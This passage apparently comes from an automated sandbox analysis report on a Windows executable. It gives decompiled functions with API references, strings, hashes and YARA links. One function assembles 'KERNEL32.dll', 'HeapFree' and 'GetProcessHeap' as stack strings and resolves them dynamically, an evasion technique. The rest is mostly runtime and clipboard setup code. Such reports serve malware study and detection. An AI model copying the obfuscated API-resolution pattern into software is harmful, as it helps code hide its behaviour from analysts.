				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				signed int _t46;
				_Unknown_base(*)()* _t56;
				void* _t57;

				_t69 =  &_v52;
				_t46 =  *0x44f5d0; // 0x765b253d
				_v4 = _t46 ^  &_v52;
				_v47 = 0x45;
				_v44 = 0x45;
				_v38 = 0x6c;
				_v37 = 0x6c;
				_v48 = 0x4b;
				_v46 = 0x52;
				_v45 = 0x4e;
				_v43 = 0x4c;
				_v42 = 0x33;
				_v41 = 0x32;
				_v40 = 0x2e;
				_v39 = 0x64;
				_v36 = 0;
				_v32 = 0x48;
				_v31 = 0x65;
				_v30 = 0x61;
				_v29 = 0x70;
				_v28 = 0x46;
				_v27 = 0x72;
				_v26 = 0x65;
				_v25 = 0x65;
				_v24 = 0;
				_v52 = GetProcAddress(LoadLibraryA( &_v48),  &_v32);
				_t27 =  &_v20; // 0x46
				_v12 = 0x73;
				_v11 = 0x73;
				_v20 = 0x47;
				_v19 = 0x65;
				_v18 = 0x74;
				_v17 = 0x50;
				_v16 = 0x72;
				_v15 = 0x6f;
				_v14 = 0x63;
				_v13 = 0x65;
				_v10 = 0x48;
				_v9 = 0x65;
				_v8 = 0x61;
				_v7 = 0x70;
				_v6 = 0;
				_t56 = GetProcAddress(LoadLibraryA( &_v48), _t27);
				_t57 =  *_t56(0, __esi);
				return E0042569C(_v52(), 0x65, _v16 ^ _t69, _t27, LoadLibraryA, __esi, _t57);
			}

0x00402eb0
0x00402eb3
0x00402eba
0x00402ec1
0x00402ec5
0x00402ed3
0x00402ed7
0x00402ee7
0x00402eec
0x00402ef1
0x00402ef6
0x00402efb
0x00402f00
0x00402f05
0x00402f0a
0x00402f0f
0x00402f14
0x00402f19
0x00402f1d
0x00402f22
0x00402f27
0x00402f2c
0x00402f31
0x00402f35
0x00402f39
0x00402f49
0x00402f4f
0x00402f53
0x00402f57
0x00402f61
0x00402f66
0x00402f6a
0x00402f6f
0x00402f74
0x00402f79
0x00402f7e
0x00402f83
0x00402f87
0x00402f8c
0x00402f90
0x00402f95
0x00402f9a
0x00402fa2
0x00402fa7
0x00402fbf

APIs

LoadLibraryA.KERNEL32 ref: 00402F3E
GetProcAddress.KERNEL32(00000000), ref: 00402F47
LoadLibraryA.KERNEL32 ref: 00402F9F
GetProcAddress.KERNEL32(00000000), ref: 00402FA2

Strings

L, xrefs: 00402EF6
Fpa, xrefs: 00402F4F, 00402F5B
t, xrefs: 00402F6A
a, xrefs: 00402F90
o, xrefs: 00402F79
2, xrefs: 00402F00
a, xrefs: 00402F1D
R, xrefs: 00402EEC
., xrefs: 00402F05
N, xrefs: 00402EF1
G, xrefs: 00402F61
3, xrefs: 00402EFB
p, xrefs: 00402F95
P, xrefs: 00402F6F
d, xrefs: 00402F0A
H, xrefs: 00402F14
K, xrefs: 00402EE7
p, xrefs: 00402F22
H, xrefs: 00402F87
r, xrefs: 00402F74
c, xrefs: 00402F7E

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: .$2$3$Fpa$G$H$H$K$L$N$P$R$a$a$c$d$o$p$p$r$t
API String ID: 2574300362-2358145951
Opcode ID: b405a1746627ac02572b913743df9bb6ca2bdf9548ae531ec859788368ecdcde
Instruction ID: 3fb7527b1e06e880936019b9228e3e6c64c89df365c9f9088a436a381c8058f4
Opcode Fuzzy Hash: b405a1746627ac02572b913743df9bb6ca2bdf9548ae531ec859788368ecdcde
Instruction Fuzzy Hash: 8F31E26100D3C0D9D342DB28948874FBFD51BA6208F88598EF5C85B292C6AA8618C77B

Uniqueness

Uniqueness Score: -1.00%

Function 004241F9, Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004241F9(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}

0x00424206
0x0042420f
0x00424218
0x00424222
0x0042422c
0x00424236
0x00424240
0x0042424a
0x00424254
0x0042425e
0x00424268
0x00424272
0x00424277
0x0042427e

APIs

RegisterClipboardFormatA.USER32 ref: 00424208
RegisterClipboardFormatA.USER32 ref: 00424211
RegisterClipboardFormatA.USER32 ref: 0042421B
RegisterClipboardFormatA.USER32 ref: 00424225
RegisterClipboardFormatA.USER32 ref: 0042422F
RegisterClipboardFormatA.USER32 ref: 00424239
RegisterClipboardFormatA.USER32 ref: 00424243
RegisterClipboardFormatA.USER32 ref: 0042424D
RegisterClipboardFormatA.USER32 ref: 00424257
RegisterClipboardFormatA.USER32 ref: 00424261
RegisterClipboardFormatA.USER32 ref: 0042426B
RegisterClipboardFormatA.USER32 ref: 00424275

Strings

Embed Source, xrefs: 00424227
OwnerLink, xrefs: 0042420A
ObjectLink, xrefs: 00424213
Native, xrefs: 00424201
RichEdit Text and Objects, xrefs: 0042426D
Object Descriptor, xrefs: 0042423B
FileNameW, xrefs: 00424259
FileName, xrefs: 0042424F
Rich Text Format, xrefs: 00424263
Link Source Descriptor, xrefs: 00424245
Link Source, xrefs: 00424231
Embedded Object, xrefs: 0042421D

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: 6377991129f8093d2adcdbe6adaf4afff8ae5b24e7d46d9037476e7c742fec68
Instruction ID: 67b8a99e1fe810bfbdfd0d0b5ee00f2bbe8d356d173e21a4190a0642b51741f8
Opcode Fuzzy Hash: 6377991129f8093d2adcdbe6adaf4afff8ae5b24e7d46d9037476e7c742fec68
Instruction Fuzzy Hash: 53013970E807889ACA30BFB69C09D47BAE0FED9B107226D3FD49587550D6B8D449CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0042AB6D, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0042AB6D(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t37;
				struct HINSTANCE__* _t38;
				void* _t41;
				void* _t43;

				_t37 = __edx;
				_t30 = __ebx;
				_t38 = GetModuleHandleA("KERNEL32.DLL");
				if(_t38 != 0) {
					 *0x452e2c = GetProcAddress(_t38, "FlsAlloc");
					 *0x452e30 = GetProcAddress(_t38, "FlsGetValue");
					 *0x452e34 = GetProcAddress(_t38, "FlsSetValue");
					_t7 = GetProcAddress(_t38, "FlsFree");
					__eflags =  *0x452e2c;
					_t41 = TlsSetValue;
					 *0x452e38 = _t7;
					if( *0x452e2c == 0) {
						L6:
						 *0x452e30 = TlsGetValue;
						 *0x452e2c = E0042A88D;
						 *0x452e34 = _t41;
						 *0x452e38 = TlsFree;
					} else {
						__eflags =  *0x452e30;
						if( *0x452e30 == 0) {
							goto L6;
						} else {
							__eflags =  *0x452e34;
							if( *0x452e34 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x44f604 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x452e30);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E004275A0();
							 *0x452e2c = E0042A7BE( *0x452e2c);
							 *0x452e30 = E0042A7BE( *0x452e30);
							 *0x452e34 = E0042A7BE( *0x452e34);
							 *0x452e38 = E0042A7BE( *0x452e38);
							_t18 = E0042E0A7();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E0042A8C0(_t37);
								goto L15;
							} else {
								_push(E0042AA4C);
								_t21 =  *((intOrPtr*)(E0042A82A( *0x452e2c)))();
								__eflags = _t21 - 0xffffffff;
								 *0x44f600 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E0042AD31(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_push(_t43);
										_push( *0x44f600);
										__eflags =  *((intOrPtr*)(E0042A82A( *0x452e34)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E0042A8FD(_t30, _t37, _t38, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E0042A8C0(_t37);
					return 0;
				}
			}

0x0042ab6d
0x0042ab6d
0x0042ab79
0x0042ab7d
0x0042ab9d
0x0042abaa
0x0042abb7
0x0042abbc
0x0042abbe
0x0042abc5
0x0042abcb
0x0042abd0
0x0042abe8
0x0042abed
0x0042abf7
0x0042ac01
0x0042ac07
0x0042abd2
0x0042abd2
0x0042abd9
0x00000000
0x0042abdb
0x0042abdb
0x0042abe2
0x00000000
0x0042abe4
0x0042abe4
0x0042abe6
0x00000000
0x00000000
0x0042abe6
0x0042abe2
0x0042abd9
0x0042ac0c
0x0042ac12
0x0042ac15
0x0042ac1a
0x0042acec
0x0042acec
0x0042acec
0x0042ac20
0x0042ac27
0x0042ac29
0x0042ac2b
0x00000000
0x0042ac31
0x0042ac31
0x0042ac47
0x0042ac57
0x0042ac67
0x0042ac74
0x0042ac79
0x0042ac7e
0x0042ac80
0x0042ace7
0x0042ace7
0x00000000
0x0042ac82
0x0042ac82
0x0042ac93
0x0042ac95
0x0042ac98
0x0042ac9d
0x00000000
0x0042ac9f
0x0042acab
0x0042acad
0x0042acb1
0x00000000
0x0042acb3
0x0042acb3
0x0042acb4
0x0042acc8
0x0042acca
0x00000000
0x0042accc
0x0042accc
0x0042acce
0x0042accf
0x0042acd6
0x0042acdc
0x0042ace0
0x0042ace4
0x0042ace4
0x0042acca
0x0042acb1
0x0042ac9d
0x0042ac80
0x0042ac2b
0x0042acf0
0x0042ab7f
0x0042ab7f
0x0042ab87
0x0042ab87

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00426D11), ref: 0042AB73
__mtterm.LIBCMT ref: 0042AB7F

Part of subcall function 0042A8C0: __decode_pointer.LIBCMT ref: 0042A8D1
Part of subcall function 0042A8C0: TlsFree.KERNEL32(00000020,0042ACEC), ref: 0042A8EB
Part of subcall function 0042A8C0: DeleteCriticalSection.KERNEL32(00000000,00000000,74B065A0,00000001,0042ACEC), ref: 0042E10B
Part of subcall function 0042A8C0: DeleteCriticalSection.KERNEL32(00000020,74B065A0,00000001,0042ACEC), ref: 0042E135

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042AB95
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042ABA2
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042ABAF
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042ABBC
TlsAlloc.KERNEL32 ref: 0042AC0C
TlsSetValue.KERNEL32(00000000), ref: 0042AC27
__init_pointers.LIBCMT ref: 0042AC31
__encode_pointer.LIBCMT ref: 0042AC3C
__encode_pointer.LIBCMT ref: 0042AC4C
__encode_pointer.LIBCMT ref: 0042AC5C
__encode_pointer.LIBCMT ref: 0042AC6C
__decode_pointer.LIBCMT ref: 0042AC8D
__calloc_crt.LIBCMT ref: 0042ACA6
__decode_pointer.LIBCMT ref: 0042ACC0
GetCurrentThreadId.KERNEL32 ref: 0042ACD6

Strings

FlsFree, xrefs: 0042ABB1
FlsSetValue, xrefs: 0042ABA4
FlsGetValue, xrefs: 0042AB97
FlsAlloc, xrefs: 0042AB8F
KERNEL32.DLL, xrefs: 0042AB6E

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 4287529916-3819984048
Opcode ID: 05da0a8c19ed1927a7696fe99030020eda98787123f0488b40cf92b6eb55b266
Instruction ID: f8adf248822a4fa8400cdc0d9e44f9e243b94c7c38f125758e6856da05e2758b
Opcode Fuzzy Hash: 05da0a8c19ed1927a7696fe99030020eda98787123f0488b40cf92b6eb55b266
Instruction Fuzzy Hash: 56317331A013209BDB11BF76FF0661B3BA1AB16366B50053BED04922A2DBF9D420CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 004014A0, Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 474
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004014A0(intOrPtr __edx, void* __eflags) {
				char _v16;
				signed int _v24;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				char _v56;
				char _v60;
				char _v68;
				char _v484;
				char _v512;
				signed int _v788;
				signed int _v792;
				char _v794;
				signed int _v796;
				signed char _v800;
				signed int _v804;
				signed int _v808;
				void* _v812;
				char _v820;
				char _v828;
				signed int _v844;
				signed int _v848;
				char _v856;
				signed int _v880;
				signed int _v884;
				char _v892;
				intOrPtr _v908;
				char _v928;
				char _v936;
				intOrPtr _v948;
				intOrPtr _v960;
				char _v964;
				intOrPtr _v984;
				intOrPtr _v996;
				char _v1000;
				intOrPtr _v1016;
				char _v1028;
				signed int _v1032;
				char _v1036;
				intOrPtr _v1040;
				char _v1044;
				intOrPtr _v1048;
				char _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				char _v1068;
				char _v1072;
				char _v1076;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t169;
				signed int _t171;
				void* _t175;
				void* _t176;
				intOrPtr* _t182;
				void* _t196;
				void* _t198;
				void* _t200;
				signed int _t201;
				void* _t206;
				void* _t208;
				signed int _t209;
				void* _t214;
				void* _t215;
				void* _t216;
				signed int _t218;
				void* _t223;
				void* _t224;
				signed int _t225;
				void* _t230;
				void* _t231;
				void* _t232;
				signed int _t234;
				void* _t239;
				void* _t240;
				signed int _t241;
				signed int** _t253;
				signed int** _t255;
				signed int** _t257;
				void* _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t341;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t368;
				void* _t369;
				signed int _t370;
				signed int _t371;
				signed int _t373;
				void* _t374;
				signed int _t375;
				void* _t379;
				signed int _t380;
				signed int _t382;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t394;
				void* _t395;
				void* _t397;
				void* _t398;
				void* _t399;
				void* _t400;
				void* _t401;
				void* _t402;

				_t340 = __edx;
				_push(0xffffffff);
				_push(E0043B947);
				_push( *[fs:0x0]);
				_t382 = (_t380 & 0xfffffff8) - 0x3f0;
				_t169 =  *0x44f5d0; // 0x765b253d
				_v24 = _t169 ^ _t382;
				_push(4);
				_push(_t368);
				_t171 =  *0x44f5d0; // 0x765b253d
				_push(_t171 ^ _t382);
				 *[fs:0x0] =  &_v16;
				_t373 = 0;
				_push(0);
				_push(0);
				_push(0x442798);
				_push(6);
				_push(0);
				_push(0);
				_push(1);
				E00414935(4,  &_v484, _t368, 0, __eflags);
				_v36 = 0;
				_t175 = E00414809(__eflags);
				_t404 = _t175 - 1;
				if(_t175 == 1) {
					_push( &_v1028);
					E00414AE1(4,  &_v512, _t340, _t368, 0, _t404);
					_v40 = 1;
					_t341 = _v1032;
					_push( &_v812);
					_push(_t341);
					_v812 = 0;
					_v808 = 0;
					_v804 = 0;
					_v800 = 0;
					_v796 = 0;
					_v792 = 0;
					if(E00414D65(4, _t341) != 0) {
						E00401EE0(4, _t379, 0x442b40);
						_v52 = 2;
						E00401EE0(4, _t379, 0x442b40);
						_v56 = 3;
						E00401EC0( &_v1068, 0x4427ac,  &_v794);
						E00401C50( &_v1064, _t379, _v1068,  *((intOrPtr*)(_v1068 - 0xc)));
						_push(_v808);
						E00401EC0( &_v1076, 0x4427b8, _v812);
						E00401C50( &_v1072, _t379, _v1076,  *((intOrPtr*)(_v1076 - 0xc)));
						_t196 = E00425875(4,  &_v844,  &_v1060,  &_v844);
						_t385 = _t382 + 0x24;
						if(_t196 != 0) {
							_v1052 = 0xffffffff;
						} else {
							_v1052 = _v1036;
						}
						_t198 = E00425875(4,  &_v820,  &_v964,  &_v820);
						_t386 = _t385 + 8;
						if(_t198 != _t373) {
							_v1048 = 0xffffffff;
						} else {
							_v1048 = _v960;
						}
						_t200 = E00425875(4,  &_v820,  &_v856,  &_v820);
						_t387 = _t386 + 8;
						if(_t200 != _t373) {
							_t279 = 0xffffffffffffffff;
							__eflags = 0xffffffffffffffff;
						} else {
							_t279 = _v848;
						}
						_t201 = E00425875(_t279,  &_v892,  &_v892,  &_v820);
						asm("sbb eax, eax");
						_t370 =  !( ~_t201) & _v880;
						_t206 = E00425875(_t279,  &_v892,  &_v1000,  &_v820);
						_t388 = _t387 + 0x10;
						if(_t206 == _t373) {
							_t373 = _v984 + 1;
						}
						_t208 = E00425875(_t279,  &_v820,  &_v928,  &_v820);
						_t389 = _t388 + 8;
						if(_t208 != 0) {
							_t209 = 0;
							__eflags = 0;
						} else {
							_t209 = _v908 + 0x76c;
						}
						_push(_v1052);
						_push(_v1048);
						_push(_t279);
						_push(_t370);
						_push(_t373);
						E00401EC0( &_v1060, 0x4427c8, _t209);
						E00401C50( &_v1056, _t379, _v1060,  *((intOrPtr*)(_v1060 - 0xc)));
						_t214 = E00425875(_t279,  &_v936,  &_v936,  &_v828);
						_t391 = _t389 + 0x28;
						if(_t214 != 0) {
							_v1048 = 0xffffffff;
						} else {
							_v1048 = _v928;
						}
						_t215 = E00425875(_t279,  &_v1000,  &_v1000,  &_v820);
						_t392 = _t391 + 8;
						if(_t215 != 0) {
							_v1052 = 0xffffffff;
						} else {
							_v1052 = _v996;
						}
						_t352 =  &_v892;
						_t216 = E00425875(_t279,  &_v892,  &_v892,  &_v820);
						_t393 = _t392 + 8;
						if(_t216 != 0) {
							_t280 = _t279 | 0xffffffff;
							__eflags = _t280;
						} else {
							_t280 = _v884;
						}
						_t218 = E00425875(_t280, _t352,  &_v856,  &_v820);
						asm("sbb eax, eax");
						_t371 =  !( ~_t218) & _v844;
						_t223 = E00425875(_t280,  &_v820,  &_v964,  &_v820);
						_t394 = _t393 + 0x10;
						if(_t223 != 0) {
							_t375 = 0;
							__eflags = 0;
						} else {
							_t375 = _v948 + 1;
						}
						_t224 = E00425875(_t280,  &_v1036,  &_v1036,  &_v820);
						_t395 = _t394 + 8;
						if(_t224 != 0) {
							_t225 = 0;
							__eflags = 0;
						} else {
							_t225 = _v1016 + 0x76c;
						}
						_push(_v1048);
						_push(_v1052);
						_push(_t280);
						_push(_t371);
						_push(_t375);
						E00401EC0( &_v1060, 0x4427f0, _t225);
						E00401C50( &_v1056, _t379, _v1060,  *((intOrPtr*)(_v1060 - 0xc)));
						_t230 = E00425875(_t280,  &_v936,  &_v936,  &_v828);
						_t397 = _t395 + 0x28;
						if(_t230 != 0) {
							_v1048 = 0xffffffff;
						} else {
							_v1048 = _v928;
						}
						_t231 = E00425875(_t280,  &_v1000,  &_v1000,  &_v820);
						_t398 = _t397 + 8;
						if(_t231 != 0) {
							_v1052 = 0xffffffff;
						} else {
							_v1052 = _v996;
						}
						_t358 =  &_v892;
						_t232 = E00425875(_t280,  &_v892,  &_v892,  &_v820);
						_t399 = _t398 + 8;
						if(_t232 != 0) {
							_t281 = _t280 | 0xffffffff;
							__eflags = _t281;
						} else {
							_t281 = _v884;
						}
						_t234 = E00425875(_t281, _t358,  &_v856,  &_v820);
						asm("sbb eax, eax");
						_t368 =  !( ~_t234) & _v844;
						_t239 = E00425875(_t281,  &_v820,  &_v964,  &_v820);
						_t400 = _t399 + 0x10;
						if(_t239 != 0) {
							_t373 = 0;
							__eflags = 0;
						} else {
							_t373 = _v948 + 1;
						}
						_t240 = E00425875(_t281,  &_v1036,  &_v1036,  &_v820);
						_t401 = _t400 + 8;
						if(_t240 != 0) {
							_t241 = 0;
							__eflags = 0;
						} else {
							_t241 = _v1016 + 0x76c;
						}
						_push(_v1048);
						_push(_v1052);
						_push(_t281);
						_push(_t368);
						_push(_t373);
						E00401EC0( &_v1060, 0x442818, _t241);
						_t402 = _t401 + 0x20;
						E00401C50( &_v1056, _t379, _v1060,  *((intOrPtr*)(_v1060 - 0xc)));
						E00401EE0(_t281, _t379, 0x442b40);
						_v60 = 4;
						if((_v800 & 0x00000001) != 0) {
							E00401B30( &_v1044, _t373, 0x442840);
						}
						if((_v788 & 0x00000002) != 0) {
							E00401B30( &_v1044, _t373, 0x442848);
						}
						if((_v788 & 0x00000004) != 0) {
							E00401B30( &_v1044, _t373, 0x442850);
						}
						if((_v788 & 0x00000008) != 0) {
							E00401B30( &_v1044, _t373, 0x442858);
						}
						if((_v788 & 0x00000010) != 0) {
							E00401B30( &_v1044, _t373, 0x442860);
						}
						_t427 = _v788 & 0x00000020;
						if((_v788 & 0x00000020) != 0) {
							E00401B30( &_v1044, _t373, 0x442868);
						}
						_t362 =  &_v1060;
						E00401EC0(_t362, 0x442870, _v1044);
						_t382 = _t402 + 0xc;
						E00401C50( &_v1056, _t379, _v1060,  *((intOrPtr*)(_v1060 - 0xc)));
						E0040DECE(4, _t368, _t373, _t427, _v1064, 0, 0);
						_v68 = 3;
						_t253 = _v1064 + 0xfffffff0;
						asm("lock xadd [ecx], edx");
						_t364 = (_t362 | 0xffffffff) - 1;
						if(_t364 <= 0) {
							_t364 =  *( *_t253);
							 *((intOrPtr*)( *((intOrPtr*)(_t364 + 4))))(_t253);
						}
						_v48 = 2;
						_t255 = _v1060 + 0xfffffff0;
						asm("lock xadd [ecx], edx");
						_t366 = (_t364 | 0xffffffff) - 1;
						if(_t366 <= 0) {
							_t366 =  *( *_t255);
							 *((intOrPtr*)( *((intOrPtr*)(_t366 + 4))))(_t255);
						}
						_v48 = 1;
						_t257 = _v1056 + 0xfffffff0;
						asm("lock xadd [ecx], edx");
						_t341 = (_t366 | 0xffffffff) - 1;
						if(_t341 <= 0) {
							_t341 =  *( *_t257);
							 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))(_t257);
						}
					}
					_v48 = 0;
					_t182 = _v1040 + 0xfffffff0;
					asm("lock xadd [ecx], edx");
					_t340 = (_t341 | 0xffffffff) - 1;
					_t431 = (_t341 | 0xffffffff) - 1;
					if((_t341 | 0xffffffff) - 1 <= 0) {
						_t340 =  *((intOrPtr*)( *_t182));
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t182)) + 4))))(_t182);
					}
				}
				_v36 = 0xffffffff;
				_t176 = E004148F4(4,  &_v512, _t340, _t368, _t373, _t431);
				 *[fs:0x0] = _v44;
				_pop(_t369);
				_pop(_t374);
				_pop(_t278);
				return E0042569C(_t176, _t278, _v52 ^ _t382, _t340, _t369, _t374);
			}

0x004014a0
0x004014a6
0x004014a8
0x004014b3
0x004014b4
0x004014ba
0x004014c1
0x004014c8
0x004014ca
0x004014cb
0x004014d2
0x004014da
0x004014e0
0x004014e2
0x004014e3
0x004014e4
0x004014e9
0x004014eb
0x004014ec
0x004014ed
0x004014f6
0x00401502
0x00401509
0x0040150e
0x00401511
0x0040151b
0x00401523
0x00401528
0x00401530
0x0040153b
0x0040153c
0x0040153d
0x00401544
0x0040154b
0x00401552
0x00401559
0x00401560
0x0040156e
0x0040157d
0x0040158b
0x00401593
0x004015aa
0x004015b2
0x004015c7
0x004015da
0x004015e6
0x004015fb
0x0040160d
0x00401612
0x00401617
0x00401623
0x00401619
0x0040161d
0x0040161d
0x00401638
0x0040163d
0x00401642
0x0040164e
0x00401644
0x00401648
0x00401648
0x00401666
0x0040166b
0x00401670
0x0040167b
0x0040167b
0x00401672
0x00401672
0x00401672
0x0040168e
0x00401695
0x004016a4
0x004016af
0x004016b4
0x004016b9
0x004016bf
0x004016bf
0x004016d2
0x004016d7
0x004016dc
0x004016ec
0x004016ec
0x004016de
0x004016e5
0x004016e5
0x004016f6
0x004016f7
0x004016f8
0x004016f9
0x004016fa
0x00401706
0x0040171b
0x00401730
0x00401735
0x0040173a
0x00401749
0x0040173c
0x00401743
0x00401743
0x0040175e
0x00401763
0x00401768
0x00401774
0x0040176a
0x0040176e
0x0040176e
0x00401784
0x0040178c
0x00401791
0x00401796
0x004017a1
0x004017a1
0x00401798
0x00401798
0x00401798
0x004017b4
0x004017bb
0x004017cd
0x004017d8
0x004017dd
0x004017e2
0x004017f0
0x004017f0
0x004017e4
0x004017eb
0x004017eb
0x004017ff
0x00401804
0x00401809
0x00401816
0x00401816
0x0040180b
0x0040180f
0x0040180f
0x00401820
0x00401821
0x00401822
0x00401823
0x00401824
0x00401830
0x00401845
0x0040185a
0x0040185f
0x00401864
0x00401873
0x00401866
0x0040186d
0x0040186d
0x00401888
0x0040188d
0x00401892
0x0040189e
0x00401894
0x00401898
0x00401898
0x004018ae
0x004018b6
0x004018bb
0x004018c0
0x004018cb
0x004018cb
0x004018c2
0x004018c2
0x004018c2
0x004018de
0x004018e5
0x004018f7
0x00401902
0x00401907
0x0040190c
0x0040191a
0x0040191a
0x0040190e
0x00401915
0x00401915
0x00401929
0x0040192e
0x00401933
0x00401940
0x00401940
0x00401935
0x00401939
0x00401939
0x0040194a
0x0040194b
0x0040194c
0x0040194d
0x0040194e
0x0040195a
0x00401966
0x0040196f
0x0040197d
0x00401984
0x00401993
0x0040199e
0x0040199e
0x004019ab
0x004019b6
0x004019b6
0x004019c2
0x004019cd
0x004019cd
0x004019da
0x004019e5
0x004019e5
0x004019f2
0x004019fd
0x004019fd
0x00401a02
0x00401a0a
0x00401a15
0x00401a15
0x00401a1f
0x00401a29
0x00401a35
0x00401a3e
0x00401a4c
0x00401a51
0x00401a5d
0x00401a66
0x00401a6a
0x00401a6d
0x00401a71
0x00401a77
0x00401a77
0x00401a79
0x00401a85
0x00401a8e
0x00401a92
0x00401a95
0x00401a99
0x00401a9f
0x00401a9f
0x00401aa1
0x00401aad
0x00401ab6
0x00401aba
0x00401abd
0x00401ac1
0x00401ac7
0x00401ac7
0x00401abd
0x00401ac9
0x00401ad5
0x00401ade
0x00401ae2
0x00401ae3
0x00401ae5
0x00401ae9
0x00401aef
0x00401aef
0x00401ae5
0x00401af8
0x00401b03
0x00401b0f
